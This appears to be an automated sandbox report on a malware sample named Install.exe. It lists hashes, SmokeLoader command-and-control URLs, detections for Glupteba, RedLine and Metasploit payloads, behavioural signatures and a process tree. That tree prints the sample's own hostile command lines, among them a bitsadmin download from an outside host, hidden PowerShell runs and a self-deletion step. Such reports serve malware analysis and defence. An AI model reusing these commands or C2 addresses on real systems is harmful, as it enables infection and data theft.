Resubmissions

24-04-2021 06:39

210424-lmjja25q22 10

23-04-2021 19:10

210423-f6mvfx4yyx 10

23-04-2021 19:10

210423-3qnl3etjca 10

23-04-2021 18:20

210423-4keqsccdba 10

23-04-2021 13:38

210423-1f2d5v8a2s 10

23-04-2021 04:53

210423-eenyvz5kqj 10

23-04-2021 04:53

210423-svr8rrwggs 10

23-04-2021 04:53

210423-95h13plc2x 10

22-04-2021 19:11

210422-6s1zd291s6 10

22-04-2021 19:05

210422-dsvj9bzkvn 10

Analysis

  • max time kernel
    57s
  • max time network
    146s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    24-04-2021 06:39

Errors

Reason
Machine shutdown

General

  • Target

    Install.exe

  • Size

    497KB

  • MD5

    41a5f4fd1ea7cac4aa94a87aebccfef0

  • SHA1

    0d0abf079413a4c773754bf4fda338dc5b9a8ddc

  • SHA256

    97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

  • SHA512

    5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
rc4.i32

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 2 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 16 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 6 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 9 IoCs
  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 13 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:340
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
      1⤵
        PID:1036
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s WpnService
        1⤵
          PID:2708
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2696
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Browser
          1⤵
            PID:2580
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
            1⤵
              PID:2448
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
              1⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:2416
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
              1⤵
                PID:1936
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s SENS
                1⤵
                  PID:1408
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                  1⤵
                    PID:1396
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Themes
                    1⤵
                      PID:1144
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                      1⤵
                        PID:1092
                      • C:\Users\Admin\AppData\Local\Temp\Install.exe
                        "C:\Users\Admin\AppData\Local\Temp\Install.exe"
                        1⤵
                        • Suspicious use of WriteProcessMemory
                        PID:856
                        • C:\Users\Admin\AppData\Local\Temp\is-U3862.tmp\Install.tmp
                          "C:\Users\Admin\AppData\Local\Temp\is-U3862.tmp\Install.tmp" /SL5="$7004E,235791,152064,C:\Users\Admin\AppData\Local\Temp\Install.exe"
                          2⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of WriteProcessMemory
                          PID:4064
                          • C:\Users\Admin\AppData\Local\Temp\is-CNLPS.tmp\Ultra.exe
                            "C:\Users\Admin\AppData\Local\Temp\is-CNLPS.tmp\Ultra.exe" /S /UID=burnerch1
                            3⤵
                            • Drops file in Drivers directory
                            • Executes dropped EXE
                            • Adds Run key to start application
                            • Drops file in Program Files directory
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:520
                            • C:\Program Files\Internet Explorer\QUEQXIIPQQ\ultramediaburner.exe
                              "C:\Program Files\Internet Explorer\QUEQXIIPQQ\ultramediaburner.exe" /VERYSILENT
                              4⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:1448
                              • C:\Users\Admin\AppData\Local\Temp\is-EPO3D.tmp\ultramediaburner.tmp
                                "C:\Users\Admin\AppData\Local\Temp\is-EPO3D.tmp\ultramediaburner.tmp" /SL5="$40058,281924,62464,C:\Program Files\Internet Explorer\QUEQXIIPQQ\ultramediaburner.exe" /VERYSILENT
                                5⤵
                                • Executes dropped EXE
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of FindShellTrayWindow
                                • Suspicious use of WriteProcessMemory
                                PID:4080
                                • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                  "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                  6⤵
                                  • Executes dropped EXE
                                  PID:2112
                            • C:\Users\Admin\AppData\Local\Temp\95-340ec-265-5379d-9425c337df3df\Fowugikaro.exe
                              "C:\Users\Admin\AppData\Local\Temp\95-340ec-265-5379d-9425c337df3df\Fowugikaro.exe"
                              4⤵
                              • Executes dropped EXE
                              • Checks computer location settings
                              • Modifies system certificate store
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3128
                            • C:\Users\Admin\AppData\Local\Temp\51-9903d-ab3-cc7af-a31e7b1487b8c\Lidaekolaru.exe
                              "C:\Users\Admin\AppData\Local\Temp\51-9903d-ab3-cc7af-a31e7b1487b8c\Lidaekolaru.exe"
                              4⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of WriteProcessMemory
                              PID:1772
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lrmwbitw.alw\instEU.exe & exit
                                5⤵
                                  PID:4400
                                  • C:\Users\Admin\AppData\Local\Temp\lrmwbitw.alw\instEU.exe
                                    C:\Users\Admin\AppData\Local\Temp\lrmwbitw.alw\instEU.exe
                                    6⤵
                                    • Executes dropped EXE
                                    PID:4496
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gxqh5ama.ghb\md1_1eaf.exe & exit
                                  5⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:4280
                                  • C:\Users\Admin\AppData\Local\Temp\gxqh5ama.ghb\md1_1eaf.exe
                                    C:\Users\Admin\AppData\Local\Temp\gxqh5ama.ghb\md1_1eaf.exe
                                    6⤵
                                    • Executes dropped EXE
                                    • Checks whether UAC is enabled
                                    • Suspicious use of AdjustPrivilegeToken
                                    • Suspicious use of WriteProcessMemory
                                    PID:4400
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3twvxpx4.auq\google-game.exe & exit
                                  5⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:4700
                                  • C:\Users\Admin\AppData\Local\Temp\3twvxpx4.auq\google-game.exe
                                    C:\Users\Admin\AppData\Local\Temp\3twvxpx4.auq\google-game.exe
                                    6⤵
                                    • Executes dropped EXE
                                    • Drops file in Program Files directory
                                    • Suspicious use of SetWindowsHookEx
                                    • Suspicious use of WriteProcessMemory
                                    PID:5104
                                    • C:\Windows\SysWOW64\rundll32.exe
                                      "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                      7⤵
                                      • Loads dropped DLL
                                      • Modifies registry class
                                      • Suspicious use of AdjustPrivilegeToken
                                      • Suspicious use of WriteProcessMemory
                                      PID:4276
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zrwellnh.etc\inst.exe & exit
                                  5⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:5900
                                  • C:\Users\Admin\AppData\Local\Temp\zrwellnh.etc\inst.exe
                                    C:\Users\Admin\AppData\Local\Temp\zrwellnh.etc\inst.exe
                                    6⤵
                                    • Executes dropped EXE
                                    PID:5816
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\q15dcbpm.zrt\SunLabsPlayer.exe /S & exit
                                  5⤵
                                    PID:5124
                                    • C:\Users\Admin\AppData\Local\Temp\q15dcbpm.zrt\SunLabsPlayer.exe
                                      C:\Users\Admin\AppData\Local\Temp\q15dcbpm.zrt\SunLabsPlayer.exe /S
                                      6⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Drops file in Program Files directory
                                      PID:4932
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh9C7.tmp\tempfile.ps1"
                                        7⤵
                                          PID:5896
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh9C7.tmp\tempfile.ps1"
                                          7⤵
                                            PID:2880
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh9C7.tmp\tempfile.ps1"
                                            7⤵
                                              PID:5772
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh9C7.tmp\tempfile.ps1"
                                              7⤵
                                                PID:4316
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh9C7.tmp\tempfile.ps1"
                                                7⤵
                                                  PID:5160
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh9C7.tmp\tempfile.ps1"
                                                  7⤵
                                                    PID:2436
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh9C7.tmp\tempfile.ps1"
                                                    7⤵
                                                      PID:5332
                                                    • C:\Windows\SysWOW64\bitsadmin.exe
                                                      "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                      7⤵
                                                      • Download via BitsAdmin
                                                      PID:5144
                                                    • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                      "C:\Program Files (x86)\lighteningplayer\data_load.exe" -p8Sn1wY9H1gi4Vlf -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                      7⤵
                                                        PID:4156
                                                      • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -p3EDfsj3RM1m33yP -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                        7⤵
                                                          PID:4832
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh9C7.tmp\tempfile.ps1"
                                                          7⤵
                                                            PID:2724
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh9C7.tmp\tempfile.ps1"
                                                            7⤵
                                                              PID:5964
                                                              • C:\Windows\System32\Conhost.exe
                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                8⤵
                                                                  PID:4976
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh9C7.tmp\tempfile.ps1"
                                                                7⤵
                                                                  PID:3836
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh9C7.tmp\tempfile.ps1"
                                                                  7⤵
                                                                    PID:4020
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh9C7.tmp\tempfile.ps1"
                                                                    7⤵
                                                                      PID:4280
                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                      C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\EaIFXnVstsO\EaIFXnVstsO.dll" EaIFXnVstsO
                                                                      7⤵
                                                                        PID:1192
                                                                        • C:\Windows\system32\rundll32.exe
                                                                          C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\EaIFXnVstsO\EaIFXnVstsO.dll" EaIFXnVstsO
                                                                          8⤵
                                                                            PID:5804
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh9C7.tmp\tempfile.ps1"
                                                                          7⤵
                                                                            PID:6136
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh9C7.tmp\tempfile.ps1"
                                                                            7⤵
                                                                              PID:4420
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh9C7.tmp\tempfile.ps1"
                                                                              7⤵
                                                                                PID:2820
                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh9C7.tmp\tempfile.ps1"
                                                                                7⤵
                                                                                  PID:6076
                                                                                • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                  "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                  7⤵
                                                                                    PID:5748
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4estzlue.upm\GcleanerWW.exe /mixone & exit
                                                                                5⤵
                                                                                  PID:4976
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oeswsigf.e1s\toolspab1.exe & exit
                                                                                  5⤵
                                                                                    PID:5340
                                                                                    • C:\Users\Admin\AppData\Local\Temp\oeswsigf.e1s\toolspab1.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\oeswsigf.e1s\toolspab1.exe
                                                                                      6⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of SetThreadContext
                                                                                      PID:4396
                                                                                      • C:\Users\Admin\AppData\Local\Temp\oeswsigf.e1s\toolspab1.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\oeswsigf.e1s\toolspab1.exe
                                                                                        7⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        • Checks SCSI registry key(s)
                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                        PID:4448
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3khexpqh.d5n\c7ae36fa.exe & exit
                                                                                    5⤵
                                                                                      PID:5328
                                                                                      • C:\Users\Admin\AppData\Local\Temp\3khexpqh.d5n\c7ae36fa.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\3khexpqh.d5n\c7ae36fa.exe
                                                                                        6⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        • Checks SCSI registry key(s)
                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                        PID:5676
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xmj3cdxz.1e0\app.exe /8-2222 & exit
                                                                                      5⤵
                                                                                        PID:5508
                                                                                        • C:\Users\Admin\AppData\Local\Temp\xmj3cdxz.1e0\app.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\xmj3cdxz.1e0\app.exe /8-2222
                                                                                          6⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:5192
                                                                                          • C:\Users\Admin\AppData\Local\Temp\xmj3cdxz.1e0\app.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\xmj3cdxz.1e0\app.exe" /8-2222
                                                                                            7⤵
                                                                                              PID:3088
                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                  1⤵
                                                                                  • Suspicious use of SetThreadContext
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  • Suspicious use of WriteProcessMemory
                                                                                  PID:1172
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                    2⤵
                                                                                    • Drops file in System32 directory
                                                                                    • Checks processor information in registry
                                                                                    • Modifies data under HKEY_USERS
                                                                                    PID:5012
                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                  1⤵
                                                                                  • Drops file in Windows directory
                                                                                  • Modifies Internet Explorer settings
                                                                                  • Modifies registry class
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                  PID:860
                                                                                • C:\Windows\system32\browser_broker.exe
                                                                                  C:\Windows\system32\browser_broker.exe -Embedding
                                                                                  1⤵
                                                                                  • Modifies Internet Explorer settings
                                                                                  PID:1672
                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                  1⤵
                                                                                  • Modifies registry class
                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                  • Suspicious use of WriteProcessMemory
                                                                                  PID:4808
                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                  1⤵
                                                                                  • Modifies Internet Explorer settings
                                                                                  • Modifies registry class
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:5040
                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                  1⤵
                                                                                  • Modifies registry class
                                                                                  PID:5904
                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                  1⤵
                                                                                  • Modifies registry class
                                                                                  PID:5996
                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                  1⤵
                                                                                  • Modifies registry class
                                                                                  PID:4452
                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                  1⤵
                                                                                    PID:3264
                                                                                  • C:\Users\Admin\AppData\Local\Temp\C833.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\C833.exe
                                                                                    1⤵
                                                                                      PID:4784
                                                                                    • C:\Users\Admin\AppData\Local\Temp\CA18.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\CA18.exe
                                                                                      1⤵
                                                                                        PID:4540
                                                                                      • C:\Users\Admin\AppData\Local\Temp\D593.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\D593.exe
                                                                                        1⤵
                                                                                          PID:6052
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /c timeout 1
                                                                                            2⤵
                                                                                              PID:4288
                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                timeout 1
                                                                                                3⤵
                                                                                                • Delays execution with timeout.exe
                                                                                                PID:5864
                                                                                            • C:\Users\Admin\AppData\Local\Temp\D593.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\D593.exe"
                                                                                              2⤵
                                                                                                PID:4456
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 6052 -s 2360
                                                                                                2⤵
                                                                                                • Program crash
                                                                                                PID:5496
                                                                                            • C:\Users\Admin\AppData\Local\Temp\DD54.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\DD54.exe
                                                                                              1⤵
                                                                                                PID:4744
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\DD54.exe"
                                                                                                  2⤵
                                                                                                    PID:5452
                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                      timeout /T 10 /NOBREAK
                                                                                                      3⤵
                                                                                                      • Delays execution with timeout.exe
                                                                                                      PID:3188
                                                                                                • C:\Users\Admin\AppData\Local\Temp\E729.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\E729.exe
                                                                                                  1⤵
                                                                                                    PID:5520
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\E99B.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\E99B.exe
                                                                                                    1⤵
                                                                                                      PID:4732
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\F13D.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\F13D.exe
                                                                                                      1⤵
                                                                                                        PID:6064
                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                          C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                          2⤵
                                                                                                            PID:5212
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7F2.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\7F2.exe
                                                                                                          1⤵
                                                                                                            PID:4704
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4704 -s 848
                                                                                                              2⤵
                                                                                                              • Program crash
                                                                                                              PID:5924
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4704 -s 892
                                                                                                              2⤵
                                                                                                              • Program crash
                                                                                                              PID:5536
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4704 -s 924
                                                                                                              2⤵
                                                                                                              • Program crash
                                                                                                              PID:1276
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4704 -s 1064
                                                                                                              2⤵
                                                                                                              • Program crash
                                                                                                              PID:5304
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4704 -s 1124
                                                                                                              2⤵
                                                                                                              • Program crash
                                                                                                              PID:4412
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4704 -s 1044
                                                                                                              2⤵
                                                                                                              • Program crash
                                                                                                              PID:5716
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4704 -s 1136
                                                                                                              2⤵
                                                                                                              • Program crash
                                                                                                              PID:4752
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4704 -s 1192
                                                                                                              2⤵
                                                                                                              • Program crash
                                                                                                              PID:1844
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\CF4.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\CF4.exe
                                                                                                            1⤵
                                                                                                              PID:5848
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1840.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\1840.exe
                                                                                                              1⤵
                                                                                                                PID:6028
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\23F9.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\23F9.exe
                                                                                                                1⤵
                                                                                                                  PID:5508
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\2CE3.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\2CE3.exe
                                                                                                                  1⤵
                                                                                                                    PID:3692
                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                      C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
